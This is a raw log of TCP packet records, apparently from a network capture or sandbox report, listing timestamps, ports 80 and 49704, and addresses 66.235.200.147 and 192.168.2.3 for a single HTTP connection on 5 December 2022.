Dec 5, 2022 01:32:31.430180073 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.430212021 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.430233002 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.430244923 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.430275917 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.430299997 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.430309057 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.430341005 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.430357933 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.431080103 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.431112051 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.431130886 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.431144953 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.431176901 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.431191921 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.431206942 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.431236982 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.431255102 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.431267023 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.431298971 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.431312084 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.431330919 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.431385994 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.432004929 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.432037115 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.432069063 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.432085991 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.432099104 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.432128906 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.432158947 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.432167053 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.432190895 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.432204962 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.432221889 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.432254076 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.432267904 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.432986021 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.433020115 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.433039904 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.433051109 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.433083057 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.433096886 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.433114052 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.433142900 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.433161020 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.433172941 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.433203936 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.433235884 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.433243990 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.433280945 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.433898926 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.433932066 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.433962107 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.433985949 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.433994055 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.434026957 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.434045076 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.434056997 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.434087992 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.434101105 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.434118986 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.434150934 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.434164047 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.434912920 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.434947014 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.434968948 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.434978962 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.435010910 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.435019016 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.435043097 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.435075045 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.435105085 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.435134888 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.435147047 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.435147047 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.435165882 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.435215950 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.435827017 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.435858011 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.435889006 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.435904980 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.435920954 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.435950994 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.435971975 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.438771963 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.438807964 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.438842058 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.438843966 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.438891888 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.439460039 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.439492941 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.439526081 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.439543962 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.439563036 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.439596891 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.439611912 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.439630985 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.439663887 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.439682007 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.439697981 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.439732075 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.439749002 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.439765930 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.439799070 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.439815044 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.439831972 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.439863920 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.439888000 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.439896107 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.439929962 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.439953089 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.440181017 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.440213919 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.440232038 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.440248966 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.440282106 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.440298080 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.440315962 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.440347910 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.440366030 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.440380096 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.440431118 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.440944910 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.440978050 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.441010952 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.441030025 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.441046953 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.441081047 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.441096067 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.441117048 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.441150904 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.441169024 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.441184998 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.441217899 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.441232920 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.441890955 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.441927910 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.441951990 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.441961050 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.441994905 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.442012072 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.442030907 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.442064047 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.442081928 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.442099094 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.442131042 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.442146063 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.442163944 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.442224026 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.442831993 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.442867994 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.442913055 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.442917109 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.442949057 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.442981005 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.442996979 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.443013906 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.443047047 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.443061113 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.443079948 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.443113089 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.443125963 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.443823099 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.443856955 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.443882942 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.443891048 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.443924904 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.443943977 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.443958044 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.443990946 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.444022894 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.444051027 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.444055080 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.444070101 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.444088936 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.444137096 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.444751978 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.444787025 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.444819927 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.444837093 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.444854021 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.444885969 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.444899082 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.444919109 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.444952965 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.444964886 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.444986105 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.445019007 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.445039988 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.445063114 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.445559978 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.445714951 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.445749998 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.445780993 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.445797920 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.445816040 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.445862055 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.445862055 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.445893049 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.445924997 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.445940018 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.445957899 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.445990086 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.446027040 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.446208954 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.446676016 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.446707964 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.446724892 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.446738005 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.446769953 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.446799994 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.446805000 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.446834087 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.446849108 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.446866035 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.446908951 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.446911097 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.446940899 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.446986914 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.447606087 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.447638035 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.447669029 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.447686911 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.447700024 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.447730064 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.447782040 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.452857018 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.452888966 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.452913046 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.452922106 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.452954054 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.452972889 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.452985048 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.453016043 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.453030109 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.453047991 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.453078032 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.453093052 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.453104973 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.453155041 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.453169107 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.453202009 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.453232050 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.453247070 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.453263998 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.453294992 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.453310013 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.453326941 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.453357935 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.453372002 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.453388929 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.453421116 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.453437090 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.454144001 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.454191923 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.454210997 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.454221964 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.454255104 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.454273939 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.454284906 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.454315901 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.454346895 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.454346895 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.454380035 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.454396963 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.454411983 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.454462051 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.455076933 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.455110073 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.455141068 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.455161095 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.455173016 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.455204964 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.455219030 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.455235958 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.455265999 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.455281973 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.455296993 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.455327988 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.455344915 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.456051111 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.456083059 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.456103086 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.456115007 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.456146002 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.456162930 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.456176996 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.456208944 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.456223011 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.456239939 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.456270933 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.456285954 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.456302881 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.456351995 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.457010984 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.457050085 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.457086086 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.457098961 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.457120895 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.457156897 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.457169056 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.457194090 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.457231045 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.457245111 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.457267046 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.457304001 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.457319021 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.457962036 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.457999945 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.458034992 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.458050013 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.458070993 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.458086014 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.458107948 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.458143950 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.458180904 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.458203077 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.458215952 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.458226919 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.458252907 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.458300114 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.459012032 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.459058046 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.459089041 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.459116936 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.459124088 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.459141970 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.459170103 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.459180117 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.459199905 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.459223032 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.459225893 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.459254026 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.459280014 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.459899902 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.459933043 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.459959030 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.459980011 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.460001945 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.460002899 CET	80	49704	66.235.200.147	192.168.2.3
